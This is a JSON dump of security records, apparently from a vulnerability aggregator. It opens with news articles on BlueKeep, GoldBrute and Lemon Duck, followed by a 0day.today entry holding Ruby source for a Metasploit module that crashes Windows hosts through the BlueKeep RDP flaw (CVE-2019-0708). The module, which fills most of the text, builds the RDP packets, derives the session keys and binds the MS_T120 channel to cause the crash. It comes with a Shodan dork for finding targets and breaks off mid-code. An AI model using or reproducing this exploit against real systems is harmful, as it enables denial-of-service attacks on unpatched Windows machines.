](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "modified": "2020-10-13T20:41:52", "published": "2020-10-13T20:41:52", "id": "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "href": "https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/", "type": "threatpost", "title": "Lemon Duck Cryptocurrency-Mining Botnet Activity Spikes", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-17T02:04:32", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "The Department of Homeland Security has confirmed it has developed a working exploit for the \u201cwormable\u201d BlueKeep vulnerability. The agency issued an alert on Monday urging Windows users to update their machines as soon as possible.\n\nThe alert heightens concerns that malicious actors could soon also develop their own exploits of the BlueKeep flaw. The critical remote code execution vulnerability ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)), though fixed during Microsoft\u2019s [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin, continues to plague the security industry. Experts have warned that it could pave the way for a similar rapidly-propogating attack on the [scale of the devastating 2017 WannaCry attack](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\nThe The Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) confirmed on Monday that it was able to exploit the flaw on a Windows 2000 machine, which marks another operating system impacted by the flaw that was not part of Microsoft\u2019s original alert: \u201cCISA has coordinated with external stakeholders and determined that Windows 2000 is vulnerable to BlueKeep,\u201d according to its [advisory](<https://www.us-cert.gov/ncas/alerts/AA19-168A>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe critical bug exists in Remote Desktop Services and impacts older versions of Windows, including Windows 7, Windows XP, Server 2003 and Server 2008, Microsoft said in its original alert. This [original alert](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) did not mention Windows 2000 machines.\n\nWhile Microsoft has released patches for a number of operating systems that are no longer officially supported, including Windows Vista, Windows XP, and Windows Server 2003, the company will not patch Windows 2000 systems, according to a [TechCrunch report](<https://techcrunch.com/2019/06/17/cisa-bluekeep-working-exploit/>).\n\n\u201cWe strongly recommend that any customers using Windows 2000 should update to a supported operating system as soon as possible,\u201d a Microsoft spokesperson told Threatpost. \u201cModern operating systems include built-in protections against this, and many other threats.\u201d\n\nSupport for Windows 2000 machines ended in 2010. For Windows users running on systems that cannot be patched, CISA recommended that they upgrade end-of-life operating systems, disable unnecessary services and enable network level authentication.\n\nFor those who are running on systems for which patches are available, CISA joined Microsoft, the National Security Agency and others in urging system administrators to update as soon as possible, warning of the potential [WannaCry-level event](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\n\u201cThe Cybersecurity and Infrastructure Security Agency is issuing this Activity Alert to provide information on a vulnerability, known as \u2018BlueKeep,\u2019 that exists in the following Microsoft Windows Operating Systems, including both 32- and 64-bit versions, as well as all Service Pack versions,\u201d according to CISA\u2019s alert.\n\nThe multiple warnings are warranted. As of the end of May, one million devices were still vulnerable to BlueKeep.\n\nWorries around the vulnerability are mounting: Earlier in June, a researcher created a [proof-of-concept](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nAt the same time, threat actors are [actively sniffing out vulnerable devices](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>). Researchers with GreyNoise in May said that they are \u201cobserving sweeping tests for systems vulnerable to the RDP \u2018BlueKeep\u2019 (CVE-2019-0708) vulnerability from several dozen hosts around the Internet.\u201d\n\nSatnam Narang, senior research engineer at Tenable, said that the level of attention by CISA and other organizations is \u201ccertainly warranted.\u201d\n\n\u201cThe writing is on the wall; BlueKeep has the potential to cause widespread devastation, similar to the Wannacry worm in 2017,\u201d he said in an email. \u201cOrganizations must act and patch vulnerable systems, or implement mitigations if patching isn\u2019t easily viable.\u201d\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=ART>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts from Malwarebytes, Recorded Future and Moss Adams as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "modified": "2019-06-18T13:58:29", "published": "2019-06-18T13:58:29", "id": "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "href": "https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/", "type": "threatpost", "title": "Working BlueKeep Exploit Developed by DHS", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:45:39", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "While everyone\u2019s talking about the [BlueKeep Mega-Worm](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>), this is not the main monster to fear, according to recent web attack activity. Rather, a researcher is warning that the GoldBrute botnet poses the greatest threat to Windows systems right now.\n\nIn the past few days, GoldBrute (named after the Java class it uses) has attempted to brute-force Remote Desktop Protocol (RDP) connections for 1.5 million Windows systems and counting, according to Morphus Labs chief research officer Renato Marinho. The botnet is actively scanning the internet for machines with RDP exposed, and trying out weak or reused passwords to see if it can gain access to the systems.\n\nAfter initially spotting the activity earlier this week, \u201cafter six hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique,\u201d Marinho wrote [in a posting](<https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d>) on Thursday, adding that the botnet continues to swell in size (though he didn\u2019t quantify it). There are plenty of hosts to be had: Shodan reveals nearly 2.5 million [exposed RDP instances](<https://www.shodan.io/search?query=Remote+desktop>) as of this writing.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe danger could be extensive \u2014 RDP is used by tech support and IT admins to connect to and interact with machines remotely; it\u2019s also sometimes used by teleworking employees. Once an attacker has access to the connection, he or she has access to the Windows desktop and can set about doing anything the legitimate user would have permission to do. Obviously, pivoting into corporate networks, implanting malware, stealing information, and marshaling CPU resources for cryptomining or distributed denial-of-service attacks could all be on the cyberattack menu du jour for the GoldBrute operators.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/07120809/GoldBrute.png>)\n\nGoldBrute distribution as of June 6, 2019.\n\nSpeaking of whom, it turns out that the GoldBrute botnet is controlled by a single command-and-control (C2) server, associated with [an IP address in New Jersey](<https://myip.ms/view/ip_addresses/1755117824>). These adversaries could in theory carry all of the aforementioned attacks out on a large scale, all at once.\n\nAccording to the researcher, the C2 is exchanging data with the bots via AES-encrypted WebSocket connections to port 8333. An infected system will first be instructed to download the bot code (which is a very large 80MB package that includes the complete Java Runtime, Marinho said); once it has burrowed into its host, it starts scanning random IP addresses to find more hosts, and reporting the IP addresses back to the C2.\n\n\u201cAfter the bot reports 80 new victims, the C2 server will assign a set of targets to brute-force to the bot,\u201d Marinho said. \u201cEach bot will only try one particular username and password per target. This is possibly a strategy to fly under the radar of security tools, as each authentication attempt comes from different addresses.\u201d\n\nThe virulence of the activity should give admins pause, he added: \u201cWhile the reporting around this \u2018Bluekeep\u2019 vulnerability focused on patching vulnerable servers, exposing RDP to the internet has never been a good idea.\u201d\n\nThe BlueKeep critical remote code-execution vulnerability (CVE-2019-0708), for which a fully functioning exploit has been developed (but kept private by researchers), also lays open remote desktop services for attack. It\u2019s widely seen as the next big corporate threat, because it\u2019s wormable and requires no user interaction to spread. That\u2019s prompted the National Security Agency to warn of a potential [WannaCry-level event](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nHowever, researchers at Duo Security pointed out that if the goal is to infiltrate via remote desktop, GoldBrute is the far easier route to go.\n\n\u201cGoldBrute highlights the fact that the bulk of scanning activity) for RDP isn\u2019t BlueKeep related,\u201d they wrote [in a posting](<https://duo.com/decipher/goldbrute-botnet-is-brute-forcing-windows-rdp>) on Thursday. \u201cWhen attackers can just bypass locked screens or guess weak RDP credentials, IT departments need to focus on making sure machines are not unnecessarily exposing RDP on the internet (putting a layer in between, such as a VPN, would help) and that users know how to use RDP properly.\u201d\n\nThat said, [patching the BlueKeep flaw](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) \u2013 which affects older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2 \u2013 should obviously also be on the top of the to-do list. Millions of systems remain vulnerable to it.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "modified": "2019-06-07T17:15:57", "published": "2019-06-07T17:15:57", "id": "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "href": "https://threatpost.com/forget-bluekeep-beware-goldbrute/145482/", "type": "threatpost", "title": "Forget BlueKeep: Beware the GoldBrute", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T15:59:16", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2019-07-15T00:00:00", "title": "Microsoft Windows Remote Desktop - (BlueKeep) Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2019-07-15T00:00:00", "id": "1337DAY-ID-32978", "href": "https://0day.today/exploit/description/32978", "sourceData": "# Exploit Title: Bluekeep Denial of Service (metasploit module)\r\n# Shodan Dork: port:3389\r\n# Date: 07/14/2019\r\n# Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/)\r\n# Vendor Homepage: https://microsoft.com\r\n# Version: all affected RDP services by cve-2019-0708\r\n# Tested on: Windows XP (32-bits) / Windows 7 (64-bits)\r\n# CVE : 2019-0708\r\n\r\n# I just modified the initial metasploit module for this vuln to produce a denial of service attack.\r\n\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n Rank = NormalRanking\r\n\r\n include Msf::Auxiliary::Dos\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE',\r\n 'Description' => %q{\r\n This module checks a range of hosts for the CVE-2019-0708 vulnerability\r\n by binding the MS_T120 channel outside of its normal slot and sending\r\n DoS packets.\r\n },\r\n 'Author' =>\r\n [\r\n 'National Cyber Security Centre', # Discovery\r\n 'JaGoTu', # Module\r\n 'zerosum0x0', # Module\r\n 'Tom Sellers', # TLS support and documented packets\r\n 'RAMELLA Sebastien' # Denial of service module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-0708' ],\r\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]\r\n ],\r\n 'DisclosureDate' => '2019-05-14',\r\n 'License' => MSF_LICENSE,\r\n 'Notes' =>\r\n {\r\n 'Stability' => [ CRASH_OS_DOWN ],\r\n 'AKA' => ['BlueKeep']\r\n }\r\n ))\r\n\r\n register_options(\r\n [\r\n OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']),\r\n OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']),\r\n OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']),\r\n OptString.new('RDP_USER', [ false, 'The username to report during connection.']),\r\n OptAddressRange.new(\"RHOSTS\", [ true, 'Target address, address range or CIDR identifier']),\r\n OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389])\r\n ]\r\n )\r\n end\r\n\r\n # ------------------------------------------------------------------------- #\r\n\r\n def bin_to_hex(s)\r\n return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join)\r\n end\r\n\r\n def bytes_to_bignum(bytesIn, order = \"little\")\r\n bytes = bin_to_hex(bytesIn)\r\n if(order == \"little\")\r\n bytes = bytes.scan(/../).reverse.join('')\r\n end\r\n s = \"0x\" + bytes\r\n\r\n return(s.to_i(16))\r\n end\r\n\r\n ## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110\r\n def int_to_bytestring(daInt, num_chars = nil)\r\n unless(num_chars)\r\n bits_needed = Math.log(daInt) / Math.log(2)\r\n num_chars = (bits_needed / 8.0).ceil\r\n end\r\n if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ])\r\n [daInt].pack(pack_code)\r\n else\r\n a = (0..(num_chars)).map{ | i |\r\n (( daInt >> i*8 ) & 0xFF ).chr\r\n }.join\r\n a[0..-2] # Seems legit lol!\r\n end\r\n end\r\n\r\n def open_connection()\r\n begin\r\n connect()\r\n sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)\r\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\r\n vprint_error(\"Connection error: #{e.message}\")\r\n return(false)\r\n end\r\n \r\n return(true)\r\n end\r\n\r\n def rsa_encrypt(bignum, rsexp, rsmod)\r\n return((bignum ** rsexp) % rsmod)\r\n end\r\n\r\n # ------------------------------------------------------------------------- #\r\n\r\n ## Used to abruptly abort scanner for a given host.\r\n class RdpCommunicationError < StandardError\r\n end\r\n \r\n ## Define standard RDP constants.\r\n class RDPConstants\r\n PROTOCOL_RDP = 0\r\n end\r\n\r\n DEFAULT_CHANNELS_DEFS =\r\n \"\\x04\\x00\\x00\\x00\" + # channelCount: 4\r\n\r\n ## Channels definitions consist of a name (8 bytes) and options flags\r\n ## (4 bytes). Names are up to 7 ANSI characters with null termination.\r\n \"\\x72\\x64\\x70\\x73\\x6e\\x64\\x00\\x00\" + # rdpsnd\r\n \"\\x0f\\x00\\x00\\xc0\" +\r\n \"\\x63\\x6c\\x69\\x70\\x72\\x64\\x72\\x00\" + # cliprdr\r\n \"\\x00\\x00\\xa0\\xc0\" +\r\n \"\\x64\\x72\\x64\\x79\\x6e\\x76\\x63\" + # drdynvc\r\n \"\\x00\\x00\\x00\\x80\\xc0\" +\r\n \"\\x4d\\x53\\x5f\\x54\\x31\\x32\\x30\" + # MS_T120\r\n \"\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n ## Builds x.224 Data (DT) TPDU - Section 13.7\r\n def rdp_build_data_tpdu(data)\r\n tpkt_length = data.length + 7\r\n\r\n \"\\x03\\x00\" + # TPKT Header version 03, reserved 0\r\n [tpkt_length].pack(\"S>\") + # TPKT length\r\n \"\\x02\\xf0\" + # X.224 Data TPDU (2 bytes)\r\n \"\\x80\" + # X.224 End Of Transmission (0x80)\r\n data\r\n end\r\n\r\n ## Build the X.224 packet, encrypt with Standard RDP Security as needed.\r\n ## Default channel_id = 0x03eb = 1003.\r\n def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = \"\\x03\\xeb\", client_info = false, rdp_sec = true)\r\n flags = 0\r\n flags |= 0b1000 if(rdp_sec) # Set SEC_ENCRYPT\r\n flags |= 0b1000000 if(client_info) # Set SEC_INFO_PKT\r\n\r\n pdu = \"\"\r\n\r\n ## TS_SECURITY_HEADER - 2.2.8.1.1.2.1\r\n ## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs.\r\n if(client_info || rdp_sec)\r\n pdu << [flags].pack(\"S<\") # flags \"\\x48\\x00\" = SEC_INFO_PKT | SEC_ENCRYPT\r\n pdu << \"\\x00\\x00\" # flagsHi\r\n end\r\n\r\n if(rdp_sec)\r\n ## Encrypt the payload with RDP Standard Encryption.\r\n pdu << rdp_hmac(hmackey, data)[0..7]\r\n pdu << rdp_rc4_crypt(rc4enckey, data)\r\n else\r\n pdu << data\r\n end\r\n\r\n user_data_len = pdu.length\r\n udl_with_flag = 0x8000 | user_data_len\r\n\r\n pkt = \"\\x64\" # sendDataRequest\r\n pkt << \"\\x00\\x08\" # intiator userId (TODO: for a functional client this isn't static)\r\n pkt << channel_id # channelId\r\n pkt << \"\\x70\" # dataPriority\r\n pkt << [udl_with_flag].pack(\"S>\")\r\n pkt << pdu\r\n\r\n return(rdp_build_data_tpdu(pkt))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471\r\n ## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1\r\n def rdp_build_share_control_header(type, data, channel_id = \"\\xf1\\x03\")\r\n total_len = data.length + 6\r\n\r\n return(\r\n [total_len].pack(\"S<\") + # totalLength - includes all headers\r\n [type].pack(\"S<\") + # pduType - flags 16 bit, unsigned\r\n channel_id + # PDUSource: 0x03f1 = 1009\r\n data\r\n )\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31\r\n ## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2\r\n def rdp_build_share_data_header(type, data)\r\n uncompressed_len = data.length + 4\r\n\r\n return(\r\n \"\\xea\\x03\\x01\\x00\" + # shareId: 66538\r\n \"\\x00\" + # pad1\r\n \"\\x01\" + # streamID: 1\r\n [uncompressed_len].pack(\"S<\") + # uncompressedLength - 16 bit, unsigned int\r\n [type].pack(\"C\") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2\r\n \"\\x00\" + # compressedType: 0\r\n \"\\x00\\x00\" + # compressedLength: 0\r\n data\r\n )\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b\r\n ## Virtual Channel PDU 2.2.6.1\r\n def rdp_build_virtual_channel_pdu(flags, data)\r\n data_len = data.length\r\n\r\n return(\r\n [data_len].pack(\"L<\") + # length\r\n [flags].pack(\"L<\") + # flags\r\n data\r\n )\r\n end\r\n\r\n def rdp_calculate_rc4_keys(client_random, server_random)\r\n ## preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom).\r\n preMasterSecret = client_random[0..23] + server_random[0..23]\r\n\r\n ## PreMasterHash(I) = SaltedHash(preMasterSecret, I)\r\n ## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343).\r\n masterSecret = rdp_salted_hash(preMasterSecret, \"A\", client_random,server_random) + rdp_salted_hash(preMasterSecret, \"BB\", client_random, server_random) + rdp_salted_hash(preMasterSecret, \"CCC\", client_random, server_random)\r\n\r\n ## MasterHash(I) = SaltedHash(MasterSecret, I)\r\n ## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A).\r\n sessionKeyBlob = rdp_salted_hash(masterSecret, \"X\", client_random, server_random) + rdp_salted_hash(masterSecret, \"YY\", client_random, server_random) + rdp_salted_hash(masterSecret, \"ZZZ\", client_random, server_random)\r\n\r\n ## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)).\r\n initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)\r\n\r\n ## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)).\r\n initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)\r\n\r\n macKey = sessionKeyBlob[0..15]\r\n\r\n return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob\r\n end\r\n\r\n def rdp_connection_initiation()\r\n ## Code to check if RDP is open or not.\r\n vprint_status(\"Verifying RDP protocol...\")\r\n\r\n vprint_status(\"Attempting to connect using RDP security\")\r\n rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP))\r\n\r\n received = sock.get_once(-1, 5)\r\n\r\n ## TODO: fix it.\r\n if (received and received.include? \"\\x00\\x12\\x34\\x00\")\r\n return(true)\r\n end\r\n\r\n return(false)\r\n end\r\n\r\n ## FinalHash(K) = MD5(K + ClientRandom + ServerRandom).\r\n def rdp_final_hash(k, client_random_bytes, server_random_bytes)\r\n md5 = Digest::MD5.new\r\n\r\n md5 << k\r\n md5 << client_random_bytes\r\n md5 << server_random_bytes\r\n\r\n return([md5.hexdigest].pack(\"H*\"))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94\r\n ## mac_salt_key = \"W\\x13\\xc58\\x7f\\xeb\\xa9\\x10*\\x1e\\xddV\\x96\\x8b[d\"\r\n ## data_content = \"\\x12\\x00\\x17\\x00\\xef\\x03\\xea\\x03\\x02\\x00\\x00\\x01\\x04\\x00$\\x00\\x00\\x00\"\r\n ## hmac = rdp_hmac(mac_salt_key, data_content) # hexlified: \"22d5aeb486994a0c785dc929a2855923\".\r\n def rdp_hmac(mac_salt_key, data_content)\r\n sha1 = Digest::SHA1.new\r\n md5 = Digest::MD5.new\r\n\r\n pad1 = \"\\x36\" * 40\r\n pad2 = \"\\x5c\" * 48\r\n\r\n sha1 << mac_salt_key\r\n sha1 << pad1\r\n sha1 << [data_content.length].pack('<L')\r\n sha1 << data_content\r\n\r\n md5 << mac_salt_key\r\n md5 << pad2\r\n md5 << [sha1.hexdigest].pack(\"H*\")\r\n\r\n return([md5.hexdigest].pack(\"H*\"))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c\r\n ## Parse Server MCS Connect Response PUD - 2.2.1.4\r\n def rdp_parse_connect_response(pkt)\r\n ptr = 0\r\n rdp_pkt = pkt[0x49..pkt.length]\r\n\r\n while(ptr < rdp_pkt.length)\r\n header_type = rdp_pkt[ptr..ptr + 1]\r\n header_length = rdp_pkt[ptr + 2..ptr + 3].unpack(\"S<\")[0]\r\n # vprint_status(\"header: #{bin_to_hex(header_type)}, len: #{header_length}\")\r\n\r\n if(header_type == \"\\x02\\x0c\")\r\n # vprint_status(\"Security header\")\r\n\r\n server_random = rdp_pkt[ptr + 20..ptr + 51]\r\n public_exponent = rdp_pkt[ptr + 84..ptr + 87]\r\n\r\n modulus = rdp_pkt[ptr + 88..ptr + 151]\r\n # vprint_status(\"modulus_old: #{bin_to_hex(modulus)}\")\r\n\r\n rsa_magic = rdp_pkt[ptr + 68..ptr + 71]\r\n if(rsa_magic != \"RSA1\")\r\n print_error(\"Server cert isn't RSA, this scenario isn't supported (yet).\")\r\n raise RdpCommunicationError\r\n end\r\n # vprint_status(\"RSA magic: #{rsa_magic}\")\r\n \r\n bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack(\"L<\")[0] - 8\r\n vprint_status(\"RSA #{bitlen}-bits\")\r\n\r\n modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen]\r\n # vprint_status(\"modulus_new: #{bin_to_hex(modulus)}\")\r\n end\r\n\r\n ptr += header_length\r\n end\r\n\r\n # vprint_status(\"SERVER_MODULUS: #{bin_to_hex(modulus)}\")\r\n # vprint_status(\"SERVER_EXPONENT: #{bin_to_hex(public_exponent)}\")\r\n # vprint_status(\"SERVER_RANDOM: #{bin_to_hex(server_random)}\")\r\n\r\n rsmod = bytes_to_bignum(modulus)\r\n rsexp = bytes_to_bignum(public_exponent)\r\n rsran = bytes_to_bignum(server_random)\r\n\r\n vprint_status(\"MODULUS: #{bin_to_hex(modulus)} - #{rsmod.to_s}\")\r\n vprint_status(\"EXPONENT: #{bin_to_hex(public_exponent)} - #{rsexp.to_s}\")\r\n vprint_status(\"SVRANDOM: #{bin_to_hex(server_random)} - #{rsran.to_s}\")\r\n\r\n return rsmod, rsexp, rsran, server_random, bitlen\r\n end\r\n\r\n def rdp_rc4_crypt(rc4obj, data)\r\n rc4obj.encrypt(data)\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f\r\n ## SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom))\r\n def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes)\r\n sha1 = Digest::SHA1.new\r\n md5 = Digest::MD5.new\r\n\r\n sha1 << i_bytes\r\n sha1 << s_bytes\r\n sha1 << client_random_bytes\r\n sha1 << server_random_bytes\r\n\r\n md5 << s_bytes\r\n md5 << [sha1.hexdigest].pack(\"H*\")\r\n\r\n return([md5.hexdigest].pack(\"H*\"))\r\n end\r\n\r\n def rdp_recv()\r\n buffer_1 = sock.get_once(4, 5)\r\n raise RdpCommunicationError unless buffer_1 # nil due to a timeout\r\n\r\n buffer_2 = sock.get_once(buffer_1[2..4].unpack(\"S>\")[0], 5)\r\n raise RdpCommunicationError unless buffer_2 # nil due to a timeout\r\n\r\n vprint_status(\"Received data: #{bin_to_hex(buffer_1 + buffer_2)}\")\r\n return(buffer_1 + buffer_2)\r\n end\r\n\r\n def rdp_send(data)\r\n vprint_status(\"Send data: #{bin_to_hex(data)}\")\r\n\r\n sock.put(data)\r\n end\r\n\r\n def rdp_sendrecv(data)\r\n rdp_send(data)\r\n\r\n return(rdp_recv())\r\n end\r\n\r\n # ------------------------------------------------------------------------- #\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10\r\n ## Client X.224 Connect Request PDU - 2.2.1.1\r\n def pdu_negotiation_request(user_name = \"\", requested_protocols = RDPConstants::PROTOCOL_RDP)\r\n ## Blank username is valid, nil is random.\r\n user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?)\r\n tpkt_len = user_name.length + 38\r\n x224_len = user_name.length + 33\r\n\r\n return(\r\n \"\\x03\\x00\" + # TPKT Header version 03, reserved 0\r\n [tpkt_len].pack(\"S>\") + # TPKT length: 43\r\n [x224_len].pack(\"C\") + # X.224 LengthIndicator\r\n \"\\xe0\" + # X.224 Type: Connect Request\r\n \"\\x00\\x00\" + # dst reference\r\n \"\\x00\\x00\" + # src reference\r\n \"\\x00\" + # class and options\r\n \"\\x43\\x6f\\x6f\\x6b\\x69\\x65\\x3a\\x20\\x6d\\x73\\x74\\x73\\x68\\x61\\x73\\x68\\x3d\" + # cookie - literal 'Cookie: mstshash='\r\n user_name + # Identifier \"username\"\r\n \"\\x0d\\x0a\" + # cookie terminator\r\n \"\\x01\\x00\" + # Type: RDP Negotiation Request (0x01)\r\n \"\\x08\\x00\" + # Length\r\n [requested_protocols].pack('L<') # requestedProtocols\r\n )\r\n end\r\n\r\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b\r\n def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = \"rdesktop\", channels_defs = DEFAULT_CHANNELS_DEFS)\r\n ## After negotiating TLS or NLA the connectInitial packet needs to include the\r\n ## protocol selection that the server indicated in its negotiation response.\r\n\r\n ## TODO: If this is pulled into an RDP library then the channel list likely\r\n ## needs to be build dynamically. For example, MS_T120 likely should only\r\n ## ever be sent as part of checks for CVE-2019-0708.\r\n\r\n ## build clientName - 12.2.1.3.2 Client Core Data (TS_UD_CS_CORE)\r\n ## 15 characters + null terminator, converted to unicode\r\n ## fixed length - 32 characters total\r\n name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le')\r\n name_unicode += \"\\x00\" * (32 - name_unicode.length)\r\n\r\n pdu = \"\\x7f\\x65\" + # T.125 Connect-Initial (BER: Application 101)\r\n \"\\x82\\x01\\xb2\" + # Length (BER: Length)\r\n \"\\x04\\x01\\x01\" + # CallingDomainSelector: 1 (BER: OctetString)\r\n \"\\x04\\x01\\x01\" + # CalledDomainSelector: 1 (BER: OctetString)\r\n \"\\x01\\x01\\xff\" + # UpwaredFlag: True (BER: boolean)\r\n\r\n ## Connect-Initial: Target Parameters\r\n \"\\x30\\x19\" + # TargetParamenters (BER: SequenceOf)\r\n ## *** not sure why the BER encoded Integers below have 2 byte values instead of one ***\r\n \"\\x02\\x01\\x22\\x02\\x01\\x02\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\xff\\xff\\x02\\x01\\x02\" +\r\n\r\n ## Connect-Intial: Minimum Parameters\r\n \"\\x30\\x19\" + # MinimumParameters (BER: SequencOf)\r\n \"\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\x04\\x20\\x02\\x01\\x02\" +\r\n\r\n ## Connect-Initial: Maximum Parameters\r\n \"\\x30\\x1c\" + # MaximumParameters (BER: SequencOf)\r\n \"\\x02\\x02\\xff\\xff\\x02\\x02\\xfc\\x17\\x02\\x02\\xff\\xff\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\xff\\xff\\x02\\x01\\x02\" 